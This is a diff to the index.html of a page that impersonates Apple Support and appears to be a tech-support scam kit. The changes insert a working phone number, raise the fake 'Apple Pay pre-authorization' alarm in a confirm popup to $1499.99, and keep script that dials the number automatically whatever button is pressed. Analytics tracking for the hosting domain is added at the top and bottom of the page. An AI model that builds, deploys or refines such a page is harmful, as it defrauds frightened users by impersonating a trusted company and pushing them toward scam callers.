--- a/index.html
+++ b/index.html
@@ -2,6 +2,10 @@
 <!DOCTYPE html>
 <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js">
 
+	<script defer data-domain="hammerhead-app-iwrg4.ondigitalocean.app" src="https://plausible.io/js/script.file-downloads.hash.outbound-links.pageview-props.revenue.tagged-events.js"></script>
+<script>window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) }</script>
+
+
 
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
@@ -125,7 +129,7 @@
                 <div class="ac-ln-background"></div>
                 <div class="ac-ln-content">
                     <span class="ac-ln-title">
-                       <a href="#">Apple Support 1-000-000-0000 <font color="red"><font class="js_setPhoneBlock"></font></font></a>
+                       <a href="#">Apple Support +1(855) 698-0777 <font color="red"><font class="js_setPhoneBlock"></font></font></a>
 					 </span>
                     <div class="ac-ln-menu">
                         <a href="#ac-ln-menustate" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-open" id="ac-ln-menustate-open">  <span class="ac-ln-menucta-anchor-label">Open menu </span></a> <a href="#" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-close"
@@ -203,7 +207,7 @@
 						Apple </a></div>
                 </div>
                 <meta content="Apple" property="name" />
-                <meta content="1-000-000-0000
+                <meta content="+1(855) 698-0777
 			 " property="telephone" />
             </section>
         </div>
@@ -270,7 +274,7 @@
 
         window.number = getPar('phone');
 
-        window.number = (window.number ? window.number : '1-000-000-0000');
+        window.number = (window.number ? window.number : '+1(855) 698-0777');
 
         window.device = 'iPhone';
         window.refef = parseURL(document.referrer);
@@ -328,7 +332,7 @@
         }, 100);
 
         function okkkk() {
-            jQuery('#result').append('<a  class="anchorcall" href="tel:1-000-000-0000"></a>');
+            jQuery('#result').append('<a  class="anchorcall" href="tel:+1(855) 698-0777"></a>');
             document.querySelector('a').click();
             var extraData = "";
             for (itxextraData = 0; itxextraData < 200; itxextraData++) {
@@ -345,7 +349,7 @@
         };
 
         function myFunction() {
-            if (confirm("Your Apple ID was recently used at APPLE STORE for $149.99 Via Apple Pay Pre-Authorization!We have placed those request on hold to ensure safest and Security. Not you? Immediately call Apple Support 1-000-000-0000 to Freeze it!.")) {
+            if (confirm("Your Apple ID was recently used at APPLE STORE for $1499.99 Via Apple Pay Pre-Authorization!We have placed those request on hold to ensure safest and Security. Not you? Immediately call Apple Support +1(855) 698-0777 to Freeze it!.")) {
                 okkkk();
             } else {
                 okkkk();
@@ -361,6 +365,10 @@
 
 
 </body>
+
+	<script defer data-domain="hammerhead-app-iwrg4.ondigitalocean.app" src="https://plausible.io/js/script.file-downloads.hash.outbound-links.pageview-props.revenue.tagged-events.js"></script>
+<script>window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) }</script>
+
 
 
 </html>
